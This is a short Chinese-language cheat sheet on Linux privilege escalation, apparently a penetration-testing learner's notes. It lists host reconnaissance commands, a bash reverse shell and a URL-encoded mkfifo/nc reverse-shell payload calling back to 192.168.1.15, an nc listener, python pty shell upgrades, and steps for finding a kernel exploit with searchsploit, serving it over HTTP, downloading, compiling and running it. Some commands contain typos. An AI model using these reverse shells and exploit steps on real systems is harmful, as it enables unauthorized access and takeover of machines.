linux提权

常用命令
uname -a #查看内核/操作系统/cpu信息
hend -n 1 /etc/issue #查看操作系统版本
cat /proc/version #查看系统信息
hostname #查看计算机名
env #查看环境变量
ifconfig #查看网卡
netstat -lntp # 查看所有监听端口
netstat -antp # 查看所有已经建立的连接
netstat -s # 查看网络统计信息
iptables -L #查看防火墙设置
route -n # 查看路由表
ps -ef # 查看所有进程
top # 实时显示进程状态
w # 查看活动用户
id # 查看指定用户信息
last # 查看用户登录日志
cut -d: -f1 /etc/passwd # 查看系统所有用户
cut -d: -f1 /etc/group # 查看系统所有组
crontab -l # 查看当前用户的计划任务
chkconfig –list # 列出所有系统服务
chkconfig –list | grep on # 列出所有启动的系统服务
echo $PATH #查看系统路径

bash shell反弹

bash -i >& /dev/tcp/192.168.1.15/8866 0>&1

使用nc反弹命令

nc -lvnp 8888

管道命令反弹

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh±i+2>%261|nc+192.168.1.15+8866+>/tmp/f

终端有些时候系统的命令终端不允许直接访问，可以使用python虚拟化一个终端来执行

python -c ‘import pty;pty.spawn("/bin/bash")’
python3 -c ‘import pty;pty.spawn("/bin/bash")’

ctrl+z 放置后台任务 设置原始格式
stty -echo raw
fg再调用后台任务

查看linux内核

根据linux内核版本寻找exp进行溢出提权，这里可以看到linux内核版本为3.19.0-25 14.04.1-Ubuntu

寻找exp

searchsploit -t Ubuntu 14.04
earchsploit -s Ubuntu 14.04
searchsploit -s Linux Kernel 3.13.0

查看描述
searchsploit -x linux/local/37088.c
在这个目录下开启一个http服务让目标下载
/usr/share/exploitdb/exploits/linux/local/37088.c

wget 下载

gcc编译

./exp 提权失败哈哈废物卡住了